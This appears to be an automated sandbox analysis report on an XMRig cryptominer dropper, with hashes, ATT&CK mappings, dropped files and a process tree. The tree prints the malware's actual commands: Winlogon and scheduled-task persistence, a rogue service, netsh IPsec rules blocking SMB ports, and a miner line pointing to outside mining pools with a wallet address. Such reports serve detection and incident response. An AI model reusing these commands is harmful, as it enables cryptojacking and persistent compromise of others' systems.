xmrig | c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee

General

Target

aa.exe
Size

28.1MB
MD5

8d9d7f5babe3ee15f2e93a4321fa45cf
SHA1

689d53ae66e75e0b5715c0d04a7cab20e5390790
SHA256

c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
SHA512

12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91

Score

10^/10

xmrig miner persistence

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

kheXND.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe C:\\Windows\\VWPUn\\kheXND.exe"	kheXND.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner

XMRig Miner Payload 4 IoCs

miner

Processes:

resource	yara_rule
C:\Windows\VWPUn\kheXND.exe	xmrig
C:\Windows\VWPUn\kheXND.exe	xmrig
C:\Windows\VWPUn\lC.exe	xmrig
behavioral2/memory/4024-161-0x0000000000400000-0x0000000000B4B000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Executes dropped EXE 2 IoCs

Processes:

kheXND.exelC.exe

pid process

1396 kheXND.exe
4024 lC.exe

Drops file in Windows directory 64 IoCs

Processes:

kheXND.exeaa.exe

description	ioc	process
File created	C:\Windows\VWPUn\dmgd-1.dll	kheXND.exe
File created	C:\Windows\VWPUn\dmgd-4.dll	kheXND.exe
File created	C:\Windows\VWPUn\exma-1.dll	kheXND.exe
File created	C:\Windows\VWPUn\pcreposix-0.dll	kheXND.exe
File created	C:\Windows\VWPUn\riar-2.dll	kheXND.exe
File created	C:\Windows\VWPUn\tibe.dll	kheXND.exe
File created	C:\Windows\VWPUn\chrome..exe	kheXND.exe
File created	C:\Windows\VWPUn\cnli-0.dll	kheXND.exe
File created	C:\Windows\VWPUn\qdx.bat	kheXND.exe
File created	C:\Windows\VWPUn\Cstr.fb	kheXND.exe
File created	C:\Windows\VWPUn\adfw.dll	kheXND.exe
File created	C:\Windows\VWPUn\etchCore-0.x64.dll	kheXND.exe
File created	C:\Windows\VWPUn\pcla-0.dll	kheXND.exe
File opened for modification	C:\Windows\VWPUn\tscl.html	kheXND.exe
File created	C:\Windows\VWPUn\cnli-1.dll	kheXND.exe
File created	C:\Windows\VWPUn\posh-0.dll	kheXND.exe
File created	C:\Windows\VWPUn\libcurl.dll	kheXND.exe
File created	C:\Windows\VWPUn\libeay32.dll	kheXND.exe
File created	C:\Windows\VWPUn\riar.dll	kheXND.exe
File opened for modification	C:\Windows\end.bat	kheXND.exe
File created	C:\Windows\VWPUn\ssleay32.dll	kheXND.exe
File created	C:\Windows\VWPUn\zibe.dll	kheXND.exe
File created	C:\Windows\VWPUn\etebCore-2.x64.dll	kheXND.exe
File created	C:\Windows\VWPUn\posh.dll	kheXND.exe
File created	C:\Windows\VWPUn\tibe-2.dll	kheXND.exe
File created	C:\Windows\VWPUn\trfo-0.dll	kheXND.exe
File created	C:\Windows\VWPUn\kheXND.exe	aa.exe
File created	C:\Windows\VWPUn\esco-0.dll	kheXND.exe
File created	C:\Windows\VWPUn\exma.dll	kheXND.exe
File created	C:\Windows\VWPUn\ucl.dll	kheXND.exe
File created	C:\Windows\VWPUn\iconv.dll	kheXND.exe
File created	C:\Windows\IME\tps.exe	aa.exe
File created	C:\Windows\VWPUn\Cstr.xml	kheXND.exe
File created	C:\Windows\VWPUn\trch-1.dll	kheXND.exe
File created	C:\Windows\VWPUn\tucl.dll	kheXND.exe
File created	C:\Windows\VWPUn\lC.exe	kheXND.exe
File created	C:\Windows\VWPUn\TFf	kheXND.exe
File created	C:\Windows\VWPUn\adfw-2.dll	kheXND.exe
File created	C:\Windows\VWPUn\pcrecpp-0.dll	kheXND.exe
File created	C:\Windows\VWPUn\trch.dll	kheXND.exe
File created	C:\Windows\VWPUn\xdvl-0.dll	kheXND.exe
File created	C:\Windows\VWPUn\etchCore-0.x86.dll	kheXND.exe
File created	C:\Windows\VWPUn\libiconv-2.dll	kheXND.exe
File created	C:\Windows\VWPUn\tibe-1.dll	kheXND.exe
File created	C:\Windows\VWPUn\trfo-2.dll	kheXND.exe
File created	C:\Windows\VWPUn\ip.dll	kheXND.exe
File created	C:\Windows\VWPUn\WinRing0x64.sys	kheXND.exe
File created	C:\Windows\VWPUn\chrome..xml	kheXND.exe
File created	C:\Windows\VWPUn\Cstr.exe	kheXND.exe
File created	C:\Windows\VWPUn\etch-0.dll	kheXND.exe
File created	C:\Windows\VWPUn\pcre-0.dll	kheXND.exe
File created	C:\Windows\VWPUn\trfo.dll	kheXND.exe
File created	C:\Windows\VWPUn\zlib1.dll	kheXND.exe
File created	C:\Windows\boy.exe	aa.exe
File created	C:\Windows\end.bat	kheXND.exe
File created	C:\Windows\VWPUn\chrome..fb	kheXND.exe
File created	C:\Windows\VWPUn\coli-0.dll	kheXND.exe
File created	C:\Windows\VWPUn\tucl-1.dll	kheXND.exe
File created	C:\Windows\VWPUn\tscl.html	aa.exe
File created	C:\Windows\VWPUn\crli-0.dll	kheXND.exe
File created	C:\Windows\VWPUn\eteb-2.dll	kheXND.exe
File created	C:\Windows\VWPUn\etebCore-2.x86.dll	kheXND.exe
File created	C:\Windows\VWPUn\libxml2.dll	kheXND.exe
File created	C:\Windows\VWPUn\trch-0.dll	kheXND.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1532 schtasks.exe

pid	process
1532	schtasks.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

Processes:

kheXND.exe

pid	process
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe
1396	kheXND.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

lC.exe

description pid process

Token: SeLockMemoryPrivilege 4024 lC.exe
Token: SeLockMemoryPrivilege 4024 lC.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

aa.exekheXND.exe

pid process

3872 aa.exe
3872 aa.exe
1396 kheXND.exe
1396 kheXND.exe

description	pid	process
Token: SeLockMemoryPrivilege	4024	lC.exe
Token: SeLockMemoryPrivilege	4024	lC.exe

pid	process
3872	aa.exe
3872	aa.exe
1396	kheXND.exe
1396	kheXND.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

aa.exekheXND.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3872 wrote to memory of 1396	3872	aa.exe	kheXND.exe
PID 3872 wrote to memory of 1396	3872	aa.exe	kheXND.exe
PID 3872 wrote to memory of 1396	3872	aa.exe	kheXND.exe
PID 3872 wrote to memory of 2364	3872	aa.exe	cmd.exe
PID 3872 wrote to memory of 2364	3872	aa.exe	cmd.exe
PID 3872 wrote to memory of 2364	3872	aa.exe	cmd.exe
PID 1396 wrote to memory of 336	1396	kheXND.exe	cmd.exe
PID 1396 wrote to memory of 336	1396	kheXND.exe	cmd.exe
PID 1396 wrote to memory of 336	1396	kheXND.exe	cmd.exe
PID 336 wrote to memory of 3464	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 3464	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 3464	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 2496	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 2496	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 2496	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 668	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 668	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 668	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 2608	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 2608	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 2608	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 2632	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 2632	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 2632	336	cmd.exe	netsh.exe
PID 1396 wrote to memory of 8	1396	kheXND.exe	cmd.exe
PID 1396 wrote to memory of 8	1396	kheXND.exe	cmd.exe
PID 1396 wrote to memory of 8	1396	kheXND.exe	cmd.exe
PID 1396 wrote to memory of 2160	1396	kheXND.exe	cmd.exe
PID 1396 wrote to memory of 2160	1396	kheXND.exe	cmd.exe
PID 1396 wrote to memory of 2160	1396	kheXND.exe	cmd.exe
PID 8 wrote to memory of 2692	8	cmd.exe	netsh.exe
PID 8 wrote to memory of 2692	8	cmd.exe	netsh.exe
PID 8 wrote to memory of 2692	8	cmd.exe	netsh.exe
PID 2160 wrote to memory of 668	2160	cmd.exe	netsh.exe
PID 2160 wrote to memory of 668	2160	cmd.exe	netsh.exe
PID 2160 wrote to memory of 668	2160	cmd.exe	netsh.exe
PID 336 wrote to memory of 2604	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 2604	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 2604	336	cmd.exe	netsh.exe
PID 8 wrote to memory of 1032	8	cmd.exe	netsh.exe
PID 8 wrote to memory of 1032	8	cmd.exe	netsh.exe
PID 8 wrote to memory of 1032	8	cmd.exe	netsh.exe
PID 336 wrote to memory of 1444	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 1444	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 1444	336	cmd.exe	netsh.exe
PID 2160 wrote to memory of 3872	2160	cmd.exe	netsh.exe
PID 2160 wrote to memory of 3872	2160	cmd.exe	netsh.exe
PID 2160 wrote to memory of 3872	2160	cmd.exe	netsh.exe
PID 8 wrote to memory of 4076	8	cmd.exe	netsh.exe
PID 8 wrote to memory of 4076	8	cmd.exe	netsh.exe
PID 8 wrote to memory of 4076	8	cmd.exe	netsh.exe
PID 2160 wrote to memory of 2372	2160	cmd.exe	netsh.exe
PID 2160 wrote to memory of 2372	2160	cmd.exe	netsh.exe
PID 2160 wrote to memory of 2372	2160	cmd.exe	netsh.exe
PID 8 wrote to memory of 2880	8	cmd.exe	netsh.exe
PID 8 wrote to memory of 2880	8	cmd.exe	netsh.exe
PID 8 wrote to memory of 2880	8	cmd.exe	netsh.exe
PID 336 wrote to memory of 3580	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 3580	336	cmd.exe	netsh.exe
PID 336 wrote to memory of 3580	336	cmd.exe	netsh.exe
PID 8 wrote to memory of 2692	8	cmd.exe	netsh.exe
PID 8 wrote to memory of 2692	8	cmd.exe	netsh.exe
PID 8 wrote to memory of 2692	8	cmd.exe	netsh.exe
PID 2160 wrote to memory of 1672	2160	cmd.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\aa.exe
"C:\Users\Admin\AppData\Local\Temp\aa.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3872

C:\Windows\VWPUn\kheXND.exe
C:\Windows\VWPUn\kheXND.exe
2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:336

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
4⤵
PID:3464

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
4⤵
PID:2496

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
4⤵
PID:668

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
4⤵
PID:2608

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
4⤵
PID:2632

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:2604

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
4⤵
PID:1444

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
4⤵
PID:3580

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
4⤵
PID:2096

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
4⤵
PID:2604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:8

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
4⤵
PID:2692

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
4⤵
PID:1032

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
4⤵
PID:4076

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
4⤵
PID:2880

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
4⤵
PID:2692

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:1056

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
4⤵
PID:2152

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
4⤵
PID:3584

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
4⤵
PID:2096

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
4⤵
PID:2696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:2160

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
4⤵
PID:668

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
4⤵
PID:3872

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
4⤵
PID:2372

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
4⤵
PID:1672

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
4⤵
PID:2608

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
4⤵
PID:2632

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
4⤵
PID:4076

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
4⤵
PID:1188

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
4⤵
PID:3564

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
4⤵
PID:3872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\end.bat" "
3⤵
PID:2700

C:\Windows\SysWOW64\sc.exe
sc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"
3⤵
PID:2856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\VWPUn\qdx.bat" "
3⤵
PID:3572

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\VWPUn\kheXND.exe" /SC ONSTART
4⤵
- Creates scheduled task(s)
PID:1532

C:\Windows\VWPUn\lC.exe
"C:\Windows\VWPUn\lC.exe" -o stratum+tcp://dns.monerogb.com:6502 -o stratum+tcp://note.monerogb.com:8666 -o stratum+tcp://wk.sdffdasdfsdfaczxfwd53.org:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=1
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4024

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\aa.exe"
2⤵
PID:2364

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Winlogon Helper DLL

1

T1004

New Service

1

T1050

Scheduled Task

1

T1053

Privilege Escalation

New Service

1

T1050

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\VWPUn\kheXND.exe
MD5
8d9d7f5babe3ee15f2e93a4321fa45cf

SHA1
689d53ae66e75e0b5715c0d04a7cab20e5390790

SHA256
c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee

SHA512
12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91

Download Submit
C:\Windows\VWPUn\kheXND.exe
MD5
8d9d7f5babe3ee15f2e93a4321fa45cf

SHA1
689d53ae66e75e0b5715c0d04a7cab20e5390790

SHA256
c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee

SHA512
12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91

Download Submit
C:\Windows\VWPUn\lC.exe
MD5
8460b86a434521fe122230467dffc2a5

SHA1
f7bd0696c9201d5270cb75deb82895a85a5298a2

SHA256
812a448e4023b2b7b52dffe30e72b77b96b4f334263e1b0f2daad8e33a68143d

SHA512
fb6504aed5c99010faa00332eecdf2916393490b79b8819a1e338238fd0f21e7255550e3155fc0efbe2295858df84ffe1f703eaf9ffdd824406f80d2c7fe58dc

Download Submit
C:\Windows\VWPUn\qdx.bat
MD5
6465c68894157f620ec31c510ef7b313

SHA1
8a55c6c2ac8e5f8b88c45fffd14adac90fc15416

SHA256
90c4bdcc3c0bff42393a75e6c6b9287002e77c10eb9a3db2d0e0e0a45d825138

SHA512
bcc2f1455a6bf047d91f6bd320bb8afa8c843087ecd476f22da1ac333eb20f2917c67d619fba5267565c2a21eaec23c5588a6dcc2780d60cba724a0253c9a071

Download Submit
C:\Windows\VWPUn\tscl.html
MD5
c6cb8affe9e0956b0b0819767a79a40f

SHA1
fded27c9a21363d802663c5e1f2cf3cb84a66f52

SHA256
b93859063108e5bf2172d614f466f0196f7f99d1634519f82143e02eef8ef789

SHA512
1f53dc5aba9582e36fe40fb665f4dc22e3f91738448f7f166287dbb893ee09998c9d9568fb2c095331c18eca81cc72a18fe70ffdf4739f1da455d27a1847268f

Download Submit
C:\Windows\end.bat
MD5
c017d5f762ae5d67efb7d099b53cca58

SHA1
ab7f8553de7614251d76ce54aaee52f1a35e7ae6

SHA256
d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b

SHA512
856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78

Download Submit
C:\Windows\end.bat
MD5
c017d5f762ae5d67efb7d099b53cca58

SHA1
ab7f8553de7614251d76ce54aaee52f1a35e7ae6

SHA256
d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b

SHA512
856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78

Download Submit
memory/8-125-0x0000000000000000-mapping.dmp

Download
memory/336-118-0x0000000000000000-mapping.dmp

Download
memory/668-129-0x0000000000000000-mapping.dmp

Download
memory/668-122-0x0000000000000000-mapping.dmp

Download
memory/1032-131-0x0000000000000000-mapping.dmp

Download
memory/1056-144-0x0000000000000000-mapping.dmp

Download
memory/1188-148-0x0000000000000000-mapping.dmp

Download
memory/1396-114-0x0000000000000000-mapping.dmp

Download
memory/1444-132-0x0000000000000000-mapping.dmp

Download
memory/1532-157-0x0000000000000000-mapping.dmp

Download
memory/1672-139-0x0000000000000000-mapping.dmp

Download
memory/2096-140-0x0000000000000000-mapping.dmp

Download
memory/2096-149-0x0000000000000000-mapping.dmp

Download
memory/2152-146-0x0000000000000000-mapping.dmp

Download
memory/2160-126-0x0000000000000000-mapping.dmp

Download
memory/2364-117-0x0000000000000000-mapping.dmp

Download
memory/2372-135-0x0000000000000000-mapping.dmp

Download
memory/2496-121-0x0000000000000000-mapping.dmp

Download
memory/2604-130-0x0000000000000000-mapping.dmp

Download
memory/2604-142-0x0000000000000000-mapping.dmp

Download
memory/2608-123-0x0000000000000000-mapping.dmp

Download
memory/2608-141-0x0000000000000000-mapping.dmp

Download
memory/2632-124-0x0000000000000000-mapping.dmp

Download
memory/2632-143-0x0000000000000000-mapping.dmp

Download
memory/2692-138-0x0000000000000000-mapping.dmp

Download
memory/2692-128-0x0000000000000000-mapping.dmp

Download
memory/2696-151-0x0000000000000000-mapping.dmp

Download
memory/2700-153-0x0000000000000000-mapping.dmp

Download
memory/2856-154-0x0000000000000000-mapping.dmp

Download
memory/2880-136-0x0000000000000000-mapping.dmp

Download
memory/3464-120-0x0000000000000000-mapping.dmp

Download
memory/3564-150-0x0000000000000000-mapping.dmp

Download
memory/3572-155-0x0000000000000000-mapping.dmp

Download
memory/3580-137-0x0000000000000000-mapping.dmp

Download
memory/3584-147-0x0000000000000000-mapping.dmp

Download
memory/3872-152-0x0000000000000000-mapping.dmp

Download
memory/3872-133-0x0000000000000000-mapping.dmp

Download
memory/4024-159-0x0000000000000000-mapping.dmp

Download
memory/4024-161-0x0000000000400000-0x0000000000B4B000-memory.dmp

Filesize
7.3MB

Download
memory/4076-145-0x0000000000000000-mapping.dmp

Download
memory/4076-134-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads